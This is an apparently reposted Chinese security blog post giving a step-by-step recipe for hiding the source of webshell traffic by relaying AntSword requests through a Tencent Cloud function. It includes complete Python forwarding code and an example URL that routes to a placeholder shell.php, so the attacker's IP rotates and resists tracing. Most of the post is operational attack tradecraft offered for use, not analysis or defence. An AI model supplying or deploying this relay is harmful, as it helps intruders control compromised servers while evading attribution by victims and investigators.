干货分享 | 防溯源链接webshell

admin 2022年7月23日01:27:22评论57 views字数 1035阅读3分27秒阅读模式

原理介绍

这个技术的核心原理是利用腾讯云的云函数将我们的请求进行转发(和一些使用第三方应用进行转发是一样的)。在国外应该早就玩烂了。


具体步骤

创建函数

使用默认模板即可,然后选择下一步。

干货分享 | 防溯源链接webshell

到这里也可以全部默认,函数名称和地域可以自己自由发挥,然后点击完成。

干货分享 | 防溯源链接webshell

然后依次打开函数管理 - 函数代码。

干货分享 | 防溯源链接webshell

然后把下面代码替换 index.py 的代码,点击部署。

# -*- coding: utf8 -*-import requestsimport jsondef geturl(urlstr):    jurlstr = json.dumps(urlstr)    dict_url = json.loads(jurlstr)    return dict_url['u']def main_handler(event, context):    url = geturl(event['queryString'])    postdata = event['body']    headers=event['headers']    resp=requests.post(url,data=postdata,headers=headers,verify=False)    response={        "isBase64Encoded": False,        "statusCode": 200,        "headers": {'Content-Type': 'text/html;charset='+resp.apparent_encoding},        "body": resp.text    }    return response


点击触发管理,就会看到访问路径,复制备用。

干货分享 | 防溯源链接webshell

开始 Webshell 请求来源隐藏

打开蚁剑,url一栏中填入 访问路径 + webshell地址,列如:

https://service-gcuy2k9u-1257053841.gz.apigw.tencentcs.com/release/APIGWHtmlDemo-1614356287?u=https://www.xxx.com/shell.php

其他设置和正常使用配置即可,看看效果。



干货分享 | 防溯源链接webshell

所有请求都是利用腾讯云的云函数将我们的请求进行转发,云函数的服务器是自带 CDN 的,所以我们每次去请求的 Webshell IP 都是不同的,这就达到了 Webshell 请求来源隐藏。

注意

在函数管理 - 函数配置里面,最好把执行超时时间设置成和蚁剑里面的超时时间一样或者更长。

干货分享 | 防溯源链接webshell

干货分享 | 防溯源链接webshell

文章来源:白帽兔


如侵权请私聊公众号删文

我知道你在看



原文始发于微信公众号(EchoSec):干货分享 | 防溯源链接webshell

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年7月23日01:27:22
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   干货分享 | 防溯源链接webshellhttp://cn-sec.com/archives/1194084.html

发表评论

匿名网友 填写信息